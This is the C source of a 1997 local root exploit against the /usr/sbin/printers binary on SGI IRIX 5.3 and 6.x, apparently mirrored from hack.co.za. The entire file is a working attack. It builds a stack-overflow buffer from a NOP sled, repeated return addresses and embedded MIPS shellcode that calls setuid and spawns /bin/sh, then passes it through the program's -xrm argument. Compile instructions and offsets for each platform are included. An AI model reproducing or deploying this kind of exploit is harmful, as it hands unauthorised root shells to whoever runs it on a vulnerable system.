/*
 
 /usr/sbin/printers.c exploit by DCRH 27/5/97
 
 Tested on: R3000 Indigo (Irix 5.3)
            R4400 Indy   (Irix 5.3)
            R8000 PChallenge (Irix64 6.2)
            R5000 O2 (Irix 6.3)
 
 Change the OFFSET to 0x184 or pass '4' as an argument for Irix 6.x
 
 compile as: cc printers.c (Irix 5.x)
             cc -n32 printers.c (Irix 6.x)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define NUM_ADDRESSES   500
#define BUF_LENGTH      500
#define EXTRA           9000
#define OFFSET          0x180      /* 0x184 for Irix 6.x */
#define GP_OFFSET       -0x80
#define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

#define u_long unsigned


u_long get_sp_code[] = {
  0x03a01025,         /* move $v0,$sp   [2000]*/
  0x03e00008,         /* jr $ra         [2000]*/
  0x00000000,         /* nop            [2000]*/
};

u_long irix_shellcode[] = {
  0x24041234,         /* li $4,0x1234   [2000]*/
  0x2084edcc,         /* sub $4,0x1234  [2000]*/
  0x0491fffe,         /* bgezal $4,pc-4 [2000]*/
  0x03bd302a,         /* sgt $6,$sp,$sp [2000]*/
  0x03bd202a,         /* sgt $4,$sp,$sp [2000]*/
  0x240203ff,         /* li $v0,1023    [2000]*/
  0x03ffffcc,         /* syscall 0xfffff[2000]*/
  0x23e40138,         /* addi $4,$31,264+48   */
  0xa086feff,         /* sb $6,-264+7($4)     */
  0x2084fef8,         /* sub $4,264     [2000]*/
  0x20850110,         /* addi $5,$4,264+8     */
  0xaca4fef8,         /* sw $4,-264($5) [2000]*/
  0xaca6fefc,         /* sw $4,-260($5) [2000]*/
  0x20a5fef8,         /* sub $5, 264    [2000]*/
  0x240203f3,         /* li $v0,1011    [2000]*/
  0x03ffffcc,         /* syscall 0xfffff[2000]*/
  0x2f62696e,         /* "/bin"         [2000]*/
  0x2f7368ff,         /* "/sh"          [2000]*/
};

char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];

void main(int argc, char **argv)
{
  char *env[] = {NULL};
  u_long targ_addr, stack, tmp;
  u_long *long_p;
  int i, code_length = strlen((char *)irix_shellcode)+1;
  u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

  stack = get_sp();

  if (stack & 0x80000000)
    {
      printf("Recompile with the '-32' option\n");
      exit(1);
    }

  long_p =(u_long *)  buf;
  targ_addr = stack + OFFSET;

  if (argc > 1)
    targ_addr += atoi(argv[1]);

  tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;

  while ((tmp & 0xff000000) == 0 ||
         (tmp & 0x00ff0000) == 0 ||
         (tmp & 0x0000ff00) == 0 ||
         (tmp & 0x000000ff) == 0)
    tmp += 4;

  for (i = 0; i < NUM_ADDRESSES/(4*sizeof(u_long)); i++)
    {
      *long_p++ = tmp;
      *long_p++ = tmp;
      *long_p++ = targ_addr;
      *long_p++ = targ_addr;
    }

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = IRIX_NOP;

  for (i = 0; i < code_length/sizeof(u_long); i++)
    *long_p++ = irix_shellcode[i];

  tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;

  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ = (tmp >> 8) | (tmp << 24);

  *long_p = 0;

  printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

  execle("/usr/sbin/printers", "printers", "-xrm", &buf[2], 0, env);
  perror("execl failed");
}
/*                    www.hack.co.za              [2000]*/